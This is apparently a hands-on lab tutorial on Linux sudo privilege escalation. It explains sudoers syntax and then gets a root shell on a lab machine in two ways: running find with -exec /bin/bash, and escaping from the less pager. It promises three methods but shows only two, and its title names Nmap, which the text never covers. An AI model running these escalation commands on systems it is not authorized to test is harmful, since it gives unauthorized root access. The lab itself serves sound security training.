Learn Sudo Privilege Escalation Methods in Nmap

Introduction

In this lab, you will learn about the sudo configuration file syntax and practice three common methods to escalate privileges through sudo vulnerabilities or misconfigurations. The goal is to gain a better understanding of how to leverage sudo for privilege escalation during a penetration test.

Sudo Configuration File Syntax

In this step, you will learn about the syntax of the /etc/sudoers file, which is used to configure sudo privileges.

The /etc/sudoers file is used to specify which users or groups can run commands with elevated privileges. To view and save the contents of the /etc/sudoers file, run the following command:

sudo cat /etc/sudoers | grep root > /home/labex/project/sudoers.txt

The output should look similar to the following:

## This file MUST be edited with the 'visudo' command as root.
## This preserves proxy settings from user environments of root
## While you shouldn't normally run git as root, you need to with etckeeper
## Per-user preferences; root won't have sensible values for them.
root    ALL=(ALL:ALL) ALL
## Members of the admin group may gain root privileges

This line specifies that the root user can run any command as any user or group on all hosts.

The general syntax for a sudoers entry is:

user_or_group_name  host_list=(run_as_user:run_as_group)  command_list

user_or_group_name: The user or group to whom the rule applies.
host_list: The host(s) on which the rule applies. The value ALL means all hosts.
run_as_user: The user whose privileges are used to run the command. The value ALL means any user.
run_as_group: The group whose privileges are used to run the command. The value ALL means any group.
command_list: The command(s) that the user or group is allowed to run.

Sudo Enables Privilege Escalation Without Argument Restrictions

In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running any command with elevated privileges.

First, open a terminal and navigate to the /home/labex/project directory.
```
cd /home/labex/project
```
Initialize the environment by running the following command:
```
./env_setup_1.sh
```
You are now logged in as the user001 user.

Use the sudo -l command to check your sudo privileges:
```
sudo -l
```
```
(root) NOPASSWD:/usr/bin/find
```
This means you can run the find command with root privileges without a password.
To escalate privileges, run:
```
sudo find /home -exec /bin/bash \;
```
You should now have a root shell.
Create a file named success_1.txt in the /root directory to verify that you have root privileges:
```
echo "success_1" | sudo tee /root/success_1.txt
```
Verify the file by running:
```
cat /root/success_1.txt
```
The output should be success_1.

Sudo Enables Privilege Escalation with Specific Command Arguments

In this step, you will practice escalating privileges by taking advantage of sudo misconfigurations that allow running specific commands with elevated privileges.

After last step, you are still logged in as the root user, for the continuation of this step, you need close the current terminal and open a new terminal.

First, open a terminal and navigate to the /home/labex/project directory.
```
cd /home/labex/project
```
Initialize the environment by running the following command:
```
./env_setup_2.sh
```
Check your sudo privileges with sudo -l:
```
sudo -l
```
Expected output:
```
(root) NOPASSWD: /bin/less /var/log/messages
```
This means you can run the command /bin/less /var/log/messages with root privileges without a password.
To escalate privileges, run:
```
sudo less /var/log/messages
```
Once inside the less pager, run:
```
!/bin/bash
```
You should now have a root shell.
Create a file named success_2.txt in the /root directory to verify that you have root privileges:
```
echo "success_2" | sudo tee /root/success_2.txt
```
Verify the file by running:
```
cat /root/success_2.txt
```
The output should be success_2.

Summary

In this lab, you learned about the syntax of the /etc/sudoers file and how to configure sudo privileges. You also practiced three common methods to escalate privileges through sudo misconfigurations or vulnerabilities. By understanding how to leverage sudo for privilege escalation, you can better assess and mitigate potential security risks in Linux systems.